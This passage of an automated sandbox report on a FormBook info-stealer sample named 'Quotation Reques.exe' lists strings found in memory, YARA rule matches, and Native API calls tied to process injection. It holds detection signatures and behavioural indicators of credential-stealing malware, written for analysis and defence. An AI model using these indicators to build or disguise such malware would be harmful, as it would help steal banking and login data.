          Source: Quotation Reques.exe, 00000000.00000002.254079677.0000000005610000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.279347914.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: Quotation Reques.exe, 00000000.00000002.254079677.0000000005610000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.279347914.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: Quotation Reques.exe, 00000000.00000002.254079677.0000000005610000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.279347914.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
          Source: Quotation Reques.exe, 00000000.00000002.254079677.0000000005610000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.279347914.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: Quotation Reques.exe, 00000000.00000002.254079677.0000000005610000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.279347914.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: Quotation Reques.exe, 00000000.00000002.254079677.0000000005610000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.279347914.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: Quotation Reques.exe, 00000000.00000002.254079677.0000000005610000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.279347914.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: Quotation Reques.exe, 00000000.00000002.254079677.0000000005610000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.279347914.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: Quotation Reques.exe, 00000000.00000002.254079677.0000000005610000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.279347914.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: Quotation Reques.exe, 00000000.00000002.254079677.0000000005610000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.279347914.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: Quotation Reques.exe, 00000000.00000002.254079677.0000000005610000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.279347914.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: Quotation Reques.exe, 00000000.00000002.254079677.0000000005610000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.279347914.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: Quotation Reques.exe, 00000000.00000002.254079677.0000000005610000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.279347914.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: Quotation Reques.exe, 00000000.00000002.254079677.0000000005610000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.279347914.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: Quotation Reques.exe, 00000000.00000002.254079677.0000000005610000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.279347914.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: Quotation Reques.exe, 00000000.00000002.254079677.0000000005610000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.279347914.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: Quotation Reques.exe, 00000000.00000002.254079677.0000000005610000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.279347914.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 00000007.00000000.279347914.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: Quotation Reques.exe, 00000000.00000002.254079677.0000000005610000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.279347914.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: Quotation Reques.exe, 00000000.00000002.254079677.0000000005610000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.279347914.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: Quotation Reques.exe, 00000000.00000002.254079677.0000000005610000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.279347914.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: cmd.exe, 00000010.00000002.497244966.00000000036D2000.00000004.00000001.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Open
          Source: cmd.exe, 00000010.00000002.497244966.00000000036D2000.00000004.00000001.sdmpString found in binary or memory: https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css
          Source: Quotation Reques.exe, 00000000.00000002.251892848.0000000002581000.00000004.00000001.sdmpString found in binary or memory: https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css
          Source: cmd.exe, 00000010.00000002.497244966.00000000036D2000.00000004.00000001.sdmpString found in binary or memory: https://static.loopia.se/responsive/images/extra_pages/website.svg
          Source: cmd.exe, 00000010.00000002.497244966.00000000036D2000.00000004.00000001.sdmpString found in binary or memory: https://static.loopia.se/responsive/images/footer/logo-grey.png
          Source: cmd.exe, 00000010.00000002.497244966.00000000036D2000.00000004.00000001.sdmpString found in binary or memory: https://www.google-analytics.com/analytics.js
          Source: cmd.exe, 00000010.00000002.497244966.00000000036D2000.00000004.00000001.sdmpString found in binary or memory: https://www.loopia.com/domainnames/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa
          Source: cmd.exe, 00000010.00000002.497244966.00000000036D2000.00000004.00000001.sdmpString found in binary or memory: https://www.loopia.com/hosting/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkin
          Source: cmd.exe, 00000010.00000002.497244966.00000000036D2000.00000004.00000001.sdmpString found in binary or memory: https://www.loopia.com/login?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingwe
          Source: cmd.exe, 00000010.00000002.497244966.00000000036D2000.00000004.00000001.sdmpString found in binary or memory: https://www.loopia.com/loopiadns/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=park
          Source: cmd.exe, 00000010.00000002.497244966.00000000036D2000.00000004.00000001.sdmpString found in binary or memory: https://www.loopia.com/order/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingw
          Source: cmd.exe, 00000010.00000002.497244966.00000000036D2000.00000004.00000001.sdmpString found in binary or memory: https://www.loopia.com/sitebuilder/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa
          Source: cmd.exe, 00000010.00000002.497244966.00000000036D2000.00000004.00000001.sdmpString found in binary or memory: https://www.loopia.com/support?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parking
          Source: cmd.exe, 00000010.00000002.497244966.00000000036D2000.00000004.00000001.sdmpString found in binary or memory: https://www.loopia.com/woocommerce/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa
          Source: cmd.exe, 00000010.00000002.497244966.00000000036D2000.00000004.00000001.sdmpString found in binary or memory: https://www.loopia.com/wordpress/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=park
          Source: cmd.exe, 00000010.00000002.497244966.00000000036D2000.00000004.00000001.sdmpString found in binary or memory: https://www.loopia.se?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb
          Source: Quotation Reques.exe, 00000000.00000002.250833656.0000000000779000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000010.00000002.491075658.00000000027A0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.295452534.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.491565528.0000000002960000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.491847161.00000000029C0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.296373263.0000000000BD0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.295627965.0000000000B80000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.252275583.0000000003589000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 6.2.Quotation Reques.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.Quotation Reques.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Quotation Reques.exe.370af40.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Quotation Reques.exe.36bb520.3.raw.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000010.00000002.491075658.00000000027A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000010.00000002.491075658.00000000027A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.295452534.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.295452534.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000010.00000002.491565528.0000000002960000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000010.00000002.491565528.0000000002960000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000010.00000002.491847161.00000000029C0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000010.00000002.491847161.00000000029C0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.296373263.0000000000BD0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.296373263.0000000000BD0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.295627965.0000000000B80000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.295627965.0000000000B80000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.252275583.0000000003589000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.252275583.0000000003589000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 6.2.Quotation Reques.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 6.2.Quotation Reques.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 6.2.Quotation Reques.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 6.2.Quotation Reques.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.Quotation Reques.exe.370af40.2.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.Quotation Reques.exe.370af40.2.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.Quotation Reques.exe.36bb520.3.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.Quotation Reques.exe.36bb520.3.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          .NET source code contains very large stringsShow sources
          Source: Quotation Reques.exe, LogIn.csLong String: Length: 13656
          Source: ftkqUsB.exe.0.dr, LogIn.csLong String: Length: 13656
          Source: 0.2.Quotation Reques.exe.90000.0.unpack, LogIn.csLong String: Length: 13656
          Source: 0.0.Quotation Reques.exe.90000.0.unpack, LogIn.csLong String: Length: 13656
          Source: 6.2.Quotation Reques.exe.660000.1.unpack, LogIn.csLong String: Length: 13656
          Source: 6.0.Quotation Reques.exe.660000.0.unpack, LogIn.csLong String: Length: 13656
          Initial sample is a PE file and has a suspicious nameShow sources
          Source: initial sampleStatic PE information: Filename: Quotation Reques.exe
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_004181D0 NtCreateFile,6_2_004181D0
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_00418280 NtReadFile,6_2_00418280
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_00418300 NtClose,6_2_00418300
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_004183B0 NtAllocateVirtualMemory,6_2_004183B0
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_004181CA NtCreateFile,6_2_004181CA
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_0041827A NtReadFile,6_2_0041827A
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_00418222 NtCreateFile,6_2_00418222
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_004182FA NtClose,6_2_004182FA
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_004183AC NtAllocateVirtualMemory,6_2_004183AC
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_0041842A NtAllocateVirtualMemory,6_2_0041842A
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_011B9910 NtAdjustPrivilegesToken,LdrInitializeThunk,6_2_011B9910
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_011B9540 NtReadFile,LdrInitializeThunk,6_2_011B9540
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_011B99A0 NtCreateSection,LdrInitializeThunk,6_2_011B99A0
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_011B95D0 NtClose,LdrInitializeThunk,6_2_011B95D0
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_011B9840 NtDelayExecution,LdrInitializeThunk,6_2_011B9840
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_011B9860 NtQuerySystemInformation,LdrInitializeThunk,6_2_011B9860
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_011B98F0 NtReadVirtualMemory,LdrInitializeThunk,6_2_011B98F0
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_011B9710 NtQueryInformationToken,LdrInitializeThunk,6_2_011B9710
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_011B9780 NtMapViewOfSection,LdrInitializeThunk,6_2_011B9780
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_011B97A0 NtUnmapViewOfSection,LdrInitializeThunk,6_2_011B97A0
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_011B9FE0 NtCreateMutant,LdrInitializeThunk,6_2_011B9FE0
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_011B9A00 NtProtectVirtualMemory,LdrInitializeThunk,6_2_011B9A00
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_011B9A20 NtResumeThread,LdrInitializeThunk,6_2_011B9A20
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_011B9A50 NtCreateFile,LdrInitializeThunk,6_2_011B9A50
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_011B9660 NtAllocateVirtualMemory,LdrInitializeThunk,6_2_011B9660
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_011B96E0 NtFreeVirtualMemory,LdrInitializeThunk,6_2_011B96E0
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_011BAD30 NtSetContextThread,6_2_011BAD30
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_011B9520 NtWaitForSingleObject,6_2_011B9520
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_011B9950 NtQueueApcThread,6_2_011B9950
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_011B9560 NtWriteFile,6_2_011B9560
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_011B99D0 NtCreateProcessEx,6_2_011B99D0
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_011B95F0 NtQueryInformationFile,6_2_011B95F0
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_011B9820 NtEnumerateKey,6_2_011B9820
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_011BB040 NtSuspendThread,6_2_011BB040
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_011B98A0 NtWriteVirtualMemory,6_2_011B98A0
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_011BA710 NtOpenProcessToken,6_2_011BA710
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_011B9B00 NtSetValueKey,6_2_011B9B00
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_011B9730 NtQueryVirtualMemory,6_2_011B9730
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_011B9770 NtSetInformationFile,6_2_011B9770
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_011BA770 NtOpenThread,6_2_011BA770
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_011B9760 NtOpenProcess,6_2_011B9760
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_011BA3B0 NtGetContextThread,6_2_011BA3B0
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_011B9610 NtEnumerateValueKey,6_2_011B9610
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_011B9A10 NtQuerySection,6_2_011B9A10
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_011B9650 NtQueryValueKey,6_2_011B9650
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_011B9670 NtQueryInformationProcess,6_2_011B9670
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_011B9A80 NtOpenDirectoryObject,6_2_011B9A80
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_011B96D0 NtCreateKey,6_2_011B96D0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_0038B42E NtOpenThreadToken,NtOpenProcessToken,NtClose,16_2_0038B42E
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_003884BE NtQueryVolumeInformationFile,GetFileInformationByHandleEx,16_2_003884BE
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_003858A4 _setjmp3,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess,longjmp,16_2_003858A4
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_0038B4F8 NtQueryInformationToken,NtQueryInformationToken,16_2_0038B4F8
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_0038B4C0 NtQueryInformationToken,16_2_0038B4C0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_003A6D90 EnterCriticalSection,LeaveCriticalSection,fprintf,fflush,TryAcquireSRWLockExclusive,NtCancelSynchronousIoFile,ReleaseSRWLockExclusive,_get_osfhandle,FlushConsoleInputBuffer,16_2_003A6D90
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_003AB5E0 SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memcpy,memcpy,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW,16_2_003AB5E0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_003A9AB4 NtSetInformationFile,16_2_003A9AB4
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_003883F2 RtlDosPathNameToRelativeNtPathName_U_WithStatus,NtOpenFile,RtlReleaseRelativeName,RtlFreeUnicodeString,CloseHandle,DeleteFileW,GetLastError,16_2_003883F2
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FF9A50 NtCreateFile,LdrInitializeThunk,16_2_02FF9A50
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FF9860 NtQuerySystemInformation,LdrInitializeThunk,16_2_02FF9860
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FF9840 NtDelayExecution,LdrInitializeThunk,16_2_02FF9840
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FF99A0 NtCreateSection,LdrInitializeThunk,16_2_02FF99A0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FF9910 NtAdjustPrivilegesToken,LdrInitializeThunk,16_2_02FF9910
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FF96E0 NtFreeVirtualMemory,LdrInitializeThunk,16_2_02FF96E0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FF96D0 NtCreateKey,LdrInitializeThunk,16_2_02FF96D0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FF9FE0 NtCreateMutant,LdrInitializeThunk,16_2_02FF9FE0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FF9780 NtMapViewOfSection,LdrInitializeThunk,16_2_02FF9780
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FF9710 NtQueryInformationToken,LdrInitializeThunk,16_2_02FF9710
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FF95D0 NtClose,LdrInitializeThunk,16_2_02FF95D0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FF9540 NtReadFile,LdrInitializeThunk,16_2_02FF9540
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FF9A80 NtOpenDirectoryObject,16_2_02FF9A80
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FF9A20 NtResumeThread,16_2_02FF9A20
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FF9A10 NtQuerySection,16_2_02FF9A10
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FF9A00 NtProtectVirtualMemory,16_2_02FF9A00
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FFA3B0 NtGetContextThread,16_2_02FFA3B0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FF9B00 NtSetValueKey,16_2_02FF9B00
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FF98F0 NtReadVirtualMemory,16_2_02FF98F0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FF98A0 NtWriteVirtualMemory,16_2_02FF98A0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FFB040 NtSuspendThread,16_2_02FFB040
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FF9820 NtEnumerateKey,16_2_02FF9820
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FF99D0 NtCreateProcessEx,16_2_02FF99D0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FF9950 NtQueueApcThread,16_2_02FF9950
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FF9670 NtQueryInformationProcess,16_2_02FF9670
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FF9660 NtAllocateVirtualMemory,16_2_02FF9660
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FF9650 NtQueryValueKey,16_2_02FF9650
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FF9610 NtEnumerateValueKey,16_2_02FF9610
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FF97A0 NtUnmapViewOfSection,16_2_02FF97A0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FFA770 NtOpenThread,16_2_02FFA770
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FF9770 NtSetInformationFile,16_2_02FF9770
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FF9760 NtOpenProcess,16_2_02FF9760
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FF9730 NtQueryVirtualMemory,16_2_02FF9730
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FFA710 NtOpenProcessToken,16_2_02FFA710
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FF95F0 NtQueryInformationFile,16_2_02FF95F0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FF9560 NtWriteFile,16_2_02FF9560
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FFAD30 NtSetContextThread,16_2_02FFAD30
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FF9520 NtWaitForSingleObject,16_2_02FF9520
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_00396550: memset,GetFileSecurityW,GetSecurityDescriptorOwner,??_V@YAXPAX@Z,memset,CreateFileW,DeviceIoControl,memcpy,CloseHandle,??_V@YAXPAX@Z,memset,??_V@YAXPAX@Z,FindClose,??_V@YAXPAX@Z,16_2_00396550
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_0039374E InitializeProcThreadAttributeList,UpdateProcThreadAttribute,memset,memset,GetStartupInfoW,lstrcmpW,CreateProcessW,CloseHandle,GetLastError,GetLastError,DeleteProcThreadAttributeList,_local_unwind4,CreateProcessAsUserW,GetLastError,CloseHandle,16_2_0039374E
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 0_2_00A1C2B00_2_00A1C2B0
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 0_2_00A199900_2_00A19990
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 0_2_06B300400_2_06B30040
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 0_2_06B32EB80_2_06B32EB8
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 0_2_06B32EA70_2_06B32EA7
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 0_2_06B32C680_2_06B32C68
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 0_2_06B32C580_2_06B32C58
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 0_2_06B30D880_2_06B30D88
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 0_2_06B3FA200_2_06B3FA20
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_0041B8626_2_0041B862
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_0041C8646_2_0041C864
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_004010306_2_00401030
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_004012FB6_2_004012FB
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_0041BB266_2_0041BB26
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_00408C6B6_2_00408C6B
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_00408C706_2_00408C70
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_0041CC1E6_2_0041CC1E
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_00402D906_2_00402D90
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_0041CE556_2_0041CE55
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_0041CFEB6_2_0041CFEB
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_00402FB06_2_00402FB0
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_0117F9006_2_0117F900
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_01242D076_2_01242D07
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_01170D206_2_01170D20
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_011941206_2_01194120
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_01241D556_2_01241D55
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_011A25816_2_011A2581
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_0118D5E06_2_0118D5E0
